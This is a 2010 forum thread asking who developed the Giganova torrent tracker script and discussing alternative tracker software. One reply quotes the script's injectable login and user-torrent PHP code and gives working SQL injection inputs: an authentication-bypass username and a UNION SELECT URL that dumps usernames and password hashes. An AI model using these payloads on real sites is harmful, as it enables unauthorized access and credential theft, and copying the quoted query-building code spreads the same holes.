Bravo List
Register
Go Back   > Bravo List > P2P > Forum > Community Cafe
Reply
Thread Tools
  #1  
Old 15th February 2010, 17:07
mario016 mario016 is offline
Member
 
Join Date: Feb 2010
P2P
Posts: 10
Smile Who is the developer?
Who is the developer for Giganova Tracker Source? Any official web?:unknown:
Thanks
Reply With Quote
  #2  
Old 15th February 2010, 17:11
Phogo's Avatar
Phogo Phogo is offline
VIP
 
Join Date: Jan 2008
United Kingdom
Posts: 902
Default
guibean made it for his site Giganova.org


but there is no support and there are xxs and sql injection in login.php

Auth bypass - login.php
Bug func:
Code:
  if (isset($_POST['username'])&&isset($_POST['password'])){ 
    $result = mysql_query("SELECT * FROM users WHERE username = '".$_POST['username']."' and password = '".md5($_POST['password'])."' LIMIT 1") or die (mysql_error()); 
    if (mysql_num_rows($result) == 0){ 
        stheader('Login Failed'); 
        login_form($_POST['username'],'Username or password incorrect.'); 
        footer(); 
        exit(); 
    }  
Username: name' OR 1=1/*


Password: anything


Sql-inj - usertorrent.php
Bug func:
Code:
  $result2 = mysql_query("SELECT * FROM torrents LEFT JOIN categories ON torrents.subcat = categories.subid WHERE posted_by='".strtolower($_GET['usuario'])."'") or die (mysql_error());  
 
Code:
usertorrent.php?usuario=giga'+union+select+1,2,3,4  ,5,6,7,8,9,10,11,12,aes_decrypt(aes_encrypt(concat  _ws(0x3a,username,password),0x71),0x71),14,15,16,1  7,18,19,20,21,22+from+users/*
Reply With Quote
The Following User Says Thank You to Phogo For This Useful Post:
Daz (15th February 2010)
  #3  
Old 15th February 2010, 17:26
mario016 mario016 is offline
Member
 
Join Date: Feb 2010
P2P
Posts: 10
Default
bugs & no support . what a pity, I was planning to use it on my site...
thank u 4 rep, Phogo :)
Reply With Quote
  #4  
Old 15th February 2010, 17:33
Phogo's Avatar
Phogo Phogo is offline
VIP
 
Join Date: Jan 2008
United Kingdom
Posts: 902
Default
You could always fix the bugs, remove the login/registration function?

Wouldn't be that hard.

The only thing with a script that this is it uses a scrape to get the stats from the announce and more and more torrents are going trackerless it will be hard to populate the index
Reply With Quote
  #5  
Old 15th February 2010, 17:47
mario016 mario016 is offline
Member
 
Join Date: Feb 2010
P2P
Posts: 10
Default
thank u 4 the suggestion, but files of a torrent can not be displayed on page is still a problem to me.
all I really want is a simple torrent indexer, like T-XORE, but badly the project seems stopped :( Any good advice plz, Phogo? Thanks :P
Reply With Quote
  #6  
Old 15th February 2010, 17:49
wMan wMan is offline
Banned
 
Join Date: Feb 2008
P2P
Posts: 1,433
Default
did u search the forum i think Txore source was sumvere here
Reply With Quote
  #7  
Old 15th February 2010, 17:49
Phogo's Avatar
Phogo Phogo is offline
VIP
 
Join Date: Jan 2008
United Kingdom
Posts: 902
Default
There are many tracker sources that support external torrents, a few with some plugins too that can auto add torrents...

phpmybittorrent can handle external
xbtit can
some tbdev can
some yuna
my forum can ;)

just depends on what you want.

PM me if you would like some help

Quote:
Originally Posted by wolfman View Post
did u search the forum i think Txore source was sumvere here
Txore suffers the same exploits
Reply With Quote
  #8  
Old 15th February 2010, 17:56
mario016 mario016 is offline
Member
 
Join Date: Feb 2010
P2P
Posts: 10
Default
Quote:
Originally Posted by wolfman View Post
did u search the forum i think Txore source was sumvere here
I did it, wolf, and I tried it before I posted this thread, but the admin panel is toooo weak... I don't think I like it...
But thanks anyway, wolf :)
Reply With Quote
  #9  
Old 15th February 2010, 18:00
wMan wMan is offline
Banned
 
Join Date: Feb 2008
P2P
Posts: 1,433
Default
hove about Torrent Hoster ??
i kinda like it but is for public tracker
Reply With Quote
  #10  
Old 15th February 2010, 18:01
mario016 mario016 is offline
Member
 
Join Date: Feb 2010
P2P
Posts: 10
Smile
Quote:
Originally Posted by Phogo View Post
There are many tracker sources that support external torrents, a few with some plugins too that can auto add torrents...

phpmybittorrent can handle external
xbtit can
some tbdev can
some yuna
my forum can ;)

just depends on what you want.

PM me if you would like some help

Txore suffers the same exploits
Thank you soooo much Phogo, I'll pm you later. I have lots of question to ask, haha :D
Reply With Quote
Reply

Tags
developer


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump



All times are GMT +2. The time now is 03:26. vBulletin skin by ForumMonkeys. Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.